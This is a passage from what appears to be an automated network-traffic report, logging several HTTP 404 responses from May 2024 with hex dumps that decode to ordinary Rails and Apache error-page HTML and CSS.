30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 238e2ff7-599a-4fd4-bb3d-a9cf08aa8df5x-runtime: 0.056269content-length: 18278connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: a8a9b9cd-96f7-44b8-b236-0f9927f5c434x-runtime: 0.033622content-length: 19290connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:20 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:23 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:25 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:28 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:17:34 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 